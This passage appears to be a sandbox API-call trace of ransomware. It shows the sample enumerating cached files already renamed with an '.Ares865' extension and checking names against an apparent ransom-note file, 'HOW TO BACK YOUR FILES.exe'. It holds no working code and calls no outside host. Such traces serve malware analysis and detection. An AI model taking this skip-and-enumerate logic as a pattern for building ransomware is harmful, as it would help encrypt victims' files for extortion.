ftLastAccessTime.dwLowDateTime=0xbf2eca30, ftLastAccessTime.dwHighDateTime=0x1d2faf2, ftLastWriteTime.dwLowDateTime=0x69f28d80, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x94e0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="adex[1].js.Ares865", cAlternateFileName="ADEX_1~1.ARE")) returned 1 [0110.872] lstrcmpiW (lpString1="adex[1].js.Ares865", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0110.873] lstrcmpiW (lpString1="adex[1].js.Ares865", lpString2="aoldtz.exe") returned -1 [0110.873] lstrcpyW (in: lpString1=0x2cce4bc, lpString2="adex[1].js.Ares865" | out: lpString1="adex[1].js.Ares865") returned="adex[1].js.Ares865" [0110.873] lstrlenW (lpString="adex[1].js.Ares865") returned 18 [0110.873] lstrlenW (lpString="Ares865") returned 7 [0110.873] lstrcmpiW (lpString1="Ares865", lpString2="Ares865") returned 0 [0110.873] FindNextFileW (in: hFindFile=0x2ccde8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x540e72d0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x540e72d0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x69f28d80, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x2b80, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="adfscript[1].Ares865", cAlternateFileName="ADFSCR~1.ARE")) returned 1 [0110.873] lstrcmpiW (lpString1="adfscript[1].Ares865", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0110.873] lstrcmpiW (lpString1="adfscript[1].Ares865", lpString2="aoldtz.exe") returned -1 [0110.873] lstrcpyW (in: lpString1=0x2cce4bc, lpString2="adfscript[1].Ares865" | out: lpString1="adfscript[1].Ares865") returned="adfscript[1].Ares865" [0110.873] lstrlenW (lpString="adfscript[1].Ares865") returned 20 [0110.873] lstrlenW (lpString="Ares865") returned 7 [0110.873] lstrcmpiW (lpString1="Ares865", lpString2="Ares865") returned 0 [0110.873] FindNextFileW (in: hFindFile=0x2ccde8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xbdb6b0f0, ftCreationTime.dwHighDateTime=0x1d2faf2, ftLastAccessTime.dwLowDateTime=0xbdb6b0f0, ftLastAccessTime.dwHighDateTime=0x1d2faf2, ftLastWriteTime.dwLowDateTime=0x69f4eee0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x5560, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="adsWrapperMSNI[1].js.Ares865", cAlternateFileName="ADSWRA~1.ARE")) returned 1 [0110.873] lstrcmpiW (lpString1="adsWrapperMSNI[1].js.Ares865", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0110.873] lstrcmpiW (lpString1="adsWrapperMSNI[1].js.Ares865", lpString2="aoldtz.exe") returned -1 [0110.873] lstrcpyW (in: lpString1=0x2cce4bc, lpString2="adsWrapperMSNI[1].js.Ares865" | out: lpString1="adsWrapperMSNI[1].js.Ares865") returned="adsWrapperMSNI[1].js.Ares865" [0110.873] lstrlenW (lpString="adsWrapperMSNI[1].js.Ares865") returned 28 [0110.873] lstrlenW (lpString="Ares865") returned 7 [0110.873] lstrcmpiW (lpString1="Ares865", lpString2="Ares865") returned 0 [0110.873] FindNextFileW (in: hFindFile=0x2ccde8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xbe967230, ftCreationTime.dwHighDateTime=0x1d2faf2, ftLastAccessTime.dwLowDateTime=0xbe967230, ftLastAccessTime.dwHighDateTime=0x1d2faf2, ftLastWriteTime.dwLowDateTime=0x69f4eee0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x8520, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="ae8e984b-1820-4a8d-93dc-392ed6563fb6[1].jpg.Ares865", cAlternateFileName="AE8E98~1.ARE")) returned 1 [0110.873] lstrcmpiW (lpString1="ae8e984b-1820-4a8d-93dc-392ed6563fb6[1].jpg.Ares865", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0110.874] lstrcmpiW (lpString1="ae8e984b-1820-4a8d-93dc-392ed6563fb6[1].jpg.Ares865", lpString2="aoldtz.exe") returned -1 [0110.874] lstrcpyW (in: lpString1=0x2cce4bc, lpString2="ae8e984b-1820-4a8d-93dc-392ed6563fb6[1].jpg.Ares865" | out: lpString1="ae8e984b-1820-4a8d-93dc-392ed6563fb6[1].jpg.Ares865") returned="ae8e984b-1820-4a8d-93dc-392ed6563fb6[1].jpg.Ares865" [0110.874] lstrlenW (lpString="ae8e984b-1820-4a8d-93dc-392ed6563fb6[1].jpg.Ares865") returned 51 [0110.874] lstrlenW (lpString="Ares865") returned 7 [0110.874] lstrcmpiW (lpString1="Ares865", lpString2="Ares865") returned 0 [0110.874] FindNextFileW (in: hFindFile=0x2ccde8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xbe112530, ftCreationTime.dwHighDateTime=0x1d2faf2, ftLastAccessTime.dwLowDateTime=0xbe112530, ftLastAccessTime.dwHighDateTime=0x1d2faf2, ftLastWriteTime.dwLowDateTime=0x69f75040, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x11b40, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="ast[1].js.Ares865", cAlternateFileName="AST_1_~1.ARE")) returned 1 [0110.874] lstrcmpiW (lpString1="ast[1].js.Ares865", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0110.874] lstrcmpiW (lpString1="ast[1].js.Ares865", lpString2="aoldtz.exe") returned 1 [0110.874] lstrcpyW (in: lpString1=0x2cce4bc, lpString2="ast[1].js.Ares865" | out: lpString1="ast[1].js.Ares865") returned="ast[1].js.Ares865" [0110.874] lstrlenW (lpString="ast[1].js.Ares865") returned 17 [0110.874] lstrlenW (lpString="Ares865") returned 7 [0110.874] lstrcmpiW (lpString1="Ares865", lpString2="Ares865") returned 0 [0110.874] FindNextFileW (in: hFindFile=0x2ccde8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x58798580, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x58798580, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x69f75040, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x16b0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="autotrack[1].js.Ares865", cAlternateFileName="AUTOTR~1.ARE")) returned 1 [0110.874] lstrcmpiW (lpString1="autotrack[1].js.Ares865", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0110.874] lstrcmpiW (lpString1="autotrack[1].js.Ares865", lpString2="aoldtz.exe") returned 1 [0110.874] lstrcpyW (in: lpString1=0x2cce4bc, lpString2="autotrack[1].js.Ares865" | out: lpString1="autotrack[1].js.Ares865") returned="autotrack[1].js.Ares865" [0110.874] lstrlenW (lpString="autotrack[1].js.Ares865") returned 23 [0110.874] lstrlenW (lpString="Ares865") returned 7 [0110.874] lstrcmpiW (lpString1="Ares865", lpString2="Ares865") returned 0 [0110.874] FindNextFileW (in: hFindFile=0x2ccde8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x45987530, ftCreationTime.dwHighDateTime=0x1d2faf3, ftLastAccessTime.dwLowDateTime=0x45987530, ftLastAccessTime.dwHighDateTime=0x1d2faf3, ftLastWriteTime.dwLowDateTime=0x69f9b1a0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x450, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="BB56XTo[1].png.Ares865", cAlternateFileName="BB56XT~1.ARE")) returned 1 [0110.874] lstrcmpiW (lpString1="BB56XTo[1].png.Ares865", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0110.875] lstrcmpiW (lpString1="BB56XTo[1].png.Ares865", lpString2="aoldtz.exe") returned 1 [0110.875] lstrcpyW (in: lpString1=0x2cce4bc, lpString2="BB56XTo[1].png.Ares865" | out: lpString1="BB56XTo[1].png.Ares865") returned="BB56XTo[1].png.Ares865" [0110.875] lstrlenW (lpString="BB56XTo[1].png.Ares865") returned 22 [0110.875] lstrlenW (lpString="Ares865") returned 7 [0110.875] lstrcmpiW (lpString1="Ares865", lpString2="Ares865") returned 0 [0110.875] FindNextFileW (in: hFindFile=0x2ccde8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x52e28590, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x52e28590, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x69f9b1a0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x4c0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="BB5vO0g[1].png.Ares865", cAlternateFileName="BB5VO0~1.ARE")) returned 1 [0110.875] lstrcmpiW (lpString1="BB5vO0g[1].png.Ares865", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0110.875] lstrcmpiW (lpString1="BB5vO0g[1].png.Ares865", lpString2="aoldtz.exe") returned 1 [0110.875] lstrcpyW (in: lpString1=0x2cce4bc, lpString2="BB5vO0g[1].png.Ares865" | out: lpString1="BB5vO0g[1].png.Ares865") returned="BB5vO0g[1].png.Ares865" [0110.875] lstrlenW (lpString="BB5vO0g[1].png.Ares865") returned 22 [0110.875] lstrlenW (lpString="Ares865") returned 7 [0110.875] lstrcmpiW (lpString1="Ares865", lpString2="Ares865") returned 0 [0110.875] FindNextFileW (in: hFindFile=0x2ccde8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x456d9c70, ftCreationTime.dwHighDateTime=0x1d2faf3, ftLastAccessTime.dwLowDateTime=0x456d9c70, ftLastAccessTime.dwHighDateTime=0x1d2faf3, ftLastWriteTime.dwLowDateTime=0x69f9b1a0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x460, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="BB8AdqN[1].png.Ares865", cAlternateFileName="BB8ADQ~1.ARE")) returned 1 [0110.875] lstrcmpiW (lpString1="BB8AdqN[1].png.Ares865", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0110.875] lstrcmpiW (lpString1="BB8AdqN[1].png.Ares865", lpString2="aoldtz.exe") returned 1 [0110.875] lstrcpyW (in: lpString1=0x2cce4bc, lpString2="BB8AdqN[1].png.Ares865" | out: lpString1="BB8AdqN[1].png.Ares865") returned="BB8AdqN[1].png.Ares865" [0110.875] lstrlenW (lpString="BB8AdqN[1].png.Ares865") returned 22 [0110.875] lstrlenW (lpString="Ares865") returned 7 [0110.875] lstrcmpiW (lpString1="Ares865", lpString2="Ares865") returned 0 [0110.875] FindNextFileW (in: hFindFile=0x2ccde8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x45be8b30, ftCreationTime.dwHighDateTime=0x1d2faf3, ftLastAccessTime.dwLowDateTime=0x45be8b30, ftLastAccessTime.dwHighDateTime=0x1d2faf3, ftLastWriteTime.dwLowDateTime=0x69fc1300, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x1830, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="BBALZyp[1].jpg.Ares865", cAlternateFileName="BBALZY~1.ARE")) returned 1 [0110.875] lstrcmpiW (lpString1="BBALZyp[1].jpg.Ares865", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0110.876] lstrcmpiW (lpString1="BBALZyp[1].jpg.Ares865", lpString2="aoldtz.exe") returned 1 [0110.876] lstrcpyW (in: lpString1=0x2cce4bc, lpString2="BBALZyp[1].jpg.Ares865" | out: lpString1="BBALZyp[1].jpg.Ares865") returned="BBALZyp[1].jpg.Ares865" [0110.876] lstrlenW (lpString="BBALZyp[1].jpg.Ares865") returned 22 [0110.876] lstrlenW (lpString="Ares865") returned 7 [0110.876] lstrcmpiW (lpString1="Ares865", lpString2="Ares865") returned 0 [0110.876] FindNextFileW (in: hFindFile=0x2ccde8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x5360ae70, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x5360ae70, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x69fc1300, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0xc80, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="BBBImKp[1].jpg.Ares865", cAlternateFileName="BBBIMK~1.ARE")) returned 1 [0110.876] lstrcmpiW (lpString1="BBBImKp[1].jpg.Ares865", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0110.876] lstrcmpiW (lpString1="BBBImKp[1].jpg.Ares865", lpString2="aoldtz.exe") returned 1 [0110.876] lstrcpyW (in: lpString1=0x2cce4bc, lpString2="BBBImKp[1].jpg.Ares865" | out: lpString1="BBBImKp[1].jpg.Ares865") returned="BBBImKp[1].jpg.Ares865" [0110.876] lstrlenW (lpString="BBBImKp[1].jpg.Ares865") returned 22 [0110.876] lstrlenW (lpString="Ares865") returned 7 [0110.876] lstrcmpiW (lpString1="Ares865", lpString2="Ares865") returned 0 [0110.876] FindNextFileW (in: hFindFile=0x2ccde8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x53598a50, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x53598a50, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x69fc1300, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x2cd0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="BBBMGJo[1].jpg.Ares865", cAlternateFileName="BBBMGJ~1.ARE")) returned 1 [0110.876] lstrcmpiW (lpString1="BBBMGJo[1].jpg.Ares865", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0110.876] lstrcmpiW (lpString1="BBBMGJo[1].jpg.Ares865", lpString2="aoldtz.exe") returned 1 [0110.876] lstrcpyW (in: lpString1=0x2cce4bc, lpString2="BBBMGJo[1].jpg.Ares865" | out: lpString1="BBBMGJo[1].jpg.Ares865") returned="BBBMGJo[1].jpg.Ares865" [0110.876] lstrlenW (lpString="BBBMGJo[1].jpg.Ares865") returned 22 [0110.876] lstrlenW (lpString="Ares865") returned 7 [0110.876] lstrcmpiW (lpString1="Ares865", lpString2="Ares865") returned 0 [0110.876] FindNextFileW (in: hFindFile=0x2ccde8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x539049f0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x539049f0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x69fc1300, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0xb70, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="BBBMKDF[1].jpg.Ares865", cAlternateFileName="BBBMKD~1.ARE")) returned 1 [0110.876] lstrcmpiW (lpString1="BBBMKDF[1].jpg.Ares865", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0110.876] lstrcmpiW (lpString1="BBBMKDF[1].jpg.Ares865", lpString2="aoldtz.exe") returned 1 [0110.877] lstrcpyW (in: lpString1=0x2cce4bc, lpString2="BBBMKDF[1].jpg.Ares865" | out: lpString1="BBBMKDF[1].jpg.Ares865") returned="BBBMKDF[1].jpg.Ares865" [0110.877] lstrlenW (lpString="BBBMKDF[1].jpg.Ares865") returned 22 [0110.877] lstrlenW (lpString="Ares865") returned 7 [0110.877] lstrcmpiW (lpString1="Ares865", lpString2="Ares865") returned 0 [0110.877] FindNextFileW (in: hFindFile=0x2ccde8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x53846310, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x53846310, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x69fe7460, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x1730, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="BBBMQch[1].jpg.Ares865", cAlternateFileName="BBBMQC~1.ARE")) returned 1 [0110.877] lstrcmpiW (lpString1="BBBMQch[1].jpg.Ares865", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0110.877] lstrcmpiW (lpString1="BBBMQch[1].jpg.Ares865", lpString2="aoldtz.exe") returned 1 [0110.877] lstrcpyW (in: lpString1=0x2cce4bc, lpString2="BBBMQch[1].jpg.Ares865" | out: lpString1="BBBMQch[1].jpg.Ares865") returned="BBBMQch[1].jpg.Ares865" [0110.877] lstrlenW (lpString="BBBMQch[1].jpg.Ares865") returned 22 [0110.877] lstrlenW (lpString="Ares865") returned 7 [0110.877] lstrcmpiW (lpString1="Ares865", lpString2="Ares865") returned 0 [0110.877] FindNextFileW (in: hFindFile=0x2ccde8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x58321c40, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x58321c40, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x69fe7460, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x4170, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="BBBMyVh[1].jpg.Ares865", cAlternateFileName="BBBMYV~1.ARE")) returned 1 [0110.877] lstrcmpiW (lpString1="BBBMyVh[1].jpg.Ares865", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0110.877] lstrcmpiW (lpString1="BBBMyVh[1].jpg.Ares865", lpString2="aoldtz.exe") returned 1 [0110.877] lstrcpyW (in: lpString1=0x2cce4bc, lpString2="BBBMyVh[1].jpg.Ares865" | out: lpString1="BBBMyVh[1].jpg.Ares865") returned="BBBMyVh[1].jpg.Ares865" [0110.877] lstrlenW (lpString="BBBMyVh[1].jpg.Ares865") returned 22 [0110.877] lstrlenW (lpString="Ares865") returned 7 [0110.878] lstrcmpiW (lpString1="Ares865", lpString2="Ares865") returned 0 [0110.878] FindNextFileW (in: hFindFile=0x2ccde8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x53337450, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x53337450, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x69fe7460, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0xb20, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="BBBNAf7[1].jpg.Ares865", cAlternateFileName="BBBNAF~1.ARE")) returned 1 [0110.878] lstrcmpiW (lpString1="BBBNAf7[1].jpg.Ares865", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0110.878] lstrcmpiW (lpString1="BBBNAf7[1].jpg.Ares865", lpString2="aoldtz.exe") returned 1 [0110.878] lstrcpyW (in: lpString1=0x2cce4bc, lpString2="BBBNAf7[1].jpg.Ares865" | out: lpString1="BBBNAf7[1].jpg.Ares865") returned="BBBNAf7[1].jpg.Ares865" [0110.878] lstrlenW (lpString="BBBNAf7[1].jpg.Ares865") returned 22 [0110.878] lstrlenW (lpString="Ares865") returned 7 [0110.878] lstrcmpiW (lpString1="Ares865", lpString2="Ares865") returned 0 [0110.878] FindNextFileW (in: hFindFile=0x2ccde8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x533a9870, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x533a9870, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x6a00d5c0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0xe30, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="BBBNnTF[1].jpg.Ares865", cAlternateFileName="BBBNNT~1.ARE")) returned 1 [0110.878] lstrcmpiW (lpString1="BBBNnTF[1].jpg.Ares865", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0110.878] lstrcmpiW (lpString1="BBBNnTF[1].jpg.Ares865", lpString2="aoldtz.exe") returned 1 [0110.878] lstrcpyW (in: lpString1=0x2cce4bc, lpString2="BBBNnTF[1].jpg.Ares865" | out: lpString1="BBBNnTF[1].jpg.Ares865") returned="BBBNnTF[1].jpg.Ares865" [0110.878] lstrlenW (lpString="BBBNnTF[1].jpg.Ares865") returned 22 [0110.878] lstrlenW (lpString="Ares865") returned 7 [0110.878] lstrcmpiW (lpString1="Ares865", lpString2="Ares865") returned 0 [0110.878] FindNextFileW (in: hFindFile=0x2ccde8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x539c30d0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x539c30d0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x6a00d5c0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x1830, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="BBBO4dZ[1].jpg.Ares865", cAlternateFileName="BBBO4D~1.ARE")) returned 1 [0110.878] lstrcmpiW (lpString1="BBBO4dZ[1].jpg.Ares865", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0110.878] lstrcmpiW (lpString1="BBBO4dZ[1].jpg.Ares865", lpString2="aoldtz.exe") returned 1 [0110.878] lstrcpyW (in: lpString1=0x2cce4bc, lpString2="BBBO4dZ[1].jpg.Ares865" | out: lpString1="BBBO4dZ[1].jpg.Ares865") returned="BBBO4dZ[1].jpg.Ares865" [0110.878] lstrlenW (lpString="BBBO4dZ[1].jpg.Ares865") returned 22 [0110.879] lstrlenW (lpString="Ares865") returned 7 [0110.879] lstrcmpiW (lpString1="Ares865", lpString2="Ares865") returned 0 [0110.879] FindNextFileW (in: hFindFile=0x2ccde8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x538b8730, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x538b8730, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x6a00d5c0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x2170, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="BBBO8ow[1].jpg.Ares865", cAlternateFileName="BBBO8O~1.ARE")) returned 1 [0110.879] lstrcmpiW (lpString1="BBBO8ow[1].jpg.Ares865", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0110.879] lstrcmpiW (lpString1="BBBO8ow[1].jpg.Ares865", lpString2="aoldtz.exe") returned 1 [0110.879] lstrcpyW (in: lpString1=0x2cce4bc, lpString2="BBBO8ow[1].jpg.Ares865" | out: lpString1="BBBO8ow[1].jpg.Ares865") returned="BBBO8ow[1].jpg.Ares865" [0110.879] lstrlenW (lpString="BBBO8ow[1].jpg.Ares865") returned 22 [0110.879] lstrlenW (lpString="Ares865") returned 7 [0110.879] lstrcmpiW (lpString1="Ares865", lpString2="Ares865") returned 0 [0110.879] FindNextFileW (in: hFindFile=0x2ccde8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x532eb190, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x532eb190, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x6a033720, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x940, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="BBBOaeS[1].jpg.Ares865", cAlternateFileName="BBBOAE~1.ARE")) returned 1 [0110.879] lstrcmpiW (lpString1="BBBOaeS[1].jpg.Ares865", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0110.879] lstrcmpiW (lpString1="BBBOaeS[1].jpg.Ares865", lpString2="aoldtz.exe") returned 1 [0110.879] lstrcpyW (in: lpString1=0x2cce4bc, lpString2="BBBOaeS[1].jpg.Ares865" | out: lpString1="BBBOaeS[1].jpg.Ares865") returned="BBBOaeS[1].jpg.Ares865" [0110.879] lstrlenW (lpString="BBBOaeS[1].jpg.Ares865") returned 22 [0110.879] lstrlenW (lpString="Ares865") returned 7 [0110.879] lstrcmpiW (lpString1="Ares865", lpString2="Ares865") returned 0 [0110.879] FindNextFileW (in: hFindFile=0x2ccde8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x53278d70, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x53278d70, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x6a033720, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0xb30, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="BBBOcIb[1].jpg.Ares865", cAlternateFileName="BBBOCI~1.ARE")) returned 1 [0110.879] lstrcmpiW (lpString1="BBBOcIb[1].jpg.Ares865", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0110.879] lstrcmpiW (lpString1="BBBOcIb[1].jpg.Ares865", lpString2="aoldtz.exe") returned 1 [0110.880] lstrcpyW (in: lpString1=0x2cce4bc, lpString2="BBBOcIb[1].jpg.Ares865" | out: lpString1="BBBOcIb[1].jpg.Ares865") returned="BBBOcIb[1].jpg.Ares865" [0110.880] lstrlenW (lpString="BBBOcIb[1].jpg.Ares865") returned 22 [0110.880] lstrlenW (lpString="Ares865") returned 7 [0110.880] lstrcmpiW (lpString1="Ares865", lpString2="Ares865") returned 0 [0110.880] FindNextFileW (in: hFindFile=0x2ccde8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x53b8c150, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x53b8c150, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x6a033720, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x1920, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="BBBOddp[1].jpg.Ares865", cAlternateFileName="BBBODD~1.ARE")) returned 1 [0110.880] lstrcmpiW (lpString1="BBBOddp[1].jpg.Ares865", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0110.880] lstrcmpiW (lpString1="BBBOddp[1].jpg.Ares865", lpString2="aoldtz.exe") returned 1 [0110.880] lstrcpyW (in: lpString1=0x2cce4bc, lpString2="BBBOddp[1].jpg.Ares865" | out: lpString1="BBBOddp[1].jpg.Ares865") returned="BBBOddp[1].jpg.Ares865" [0110.880] lstrlenW (lpString="BBBOddp[1].jpg.Ares865") returned 22 [0110.880] lstrlenW (lpString="Ares865") returned 7 [0110.880] lstrcmpiW (lpString1="Ares865", lpString2="Ares865") returned 0 [0110.880] FindNextFileW (in: hFindFile=0x2ccde8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x6a1fd500, ftCreationTime.dwHighDateTime=0x1d2dd9e, 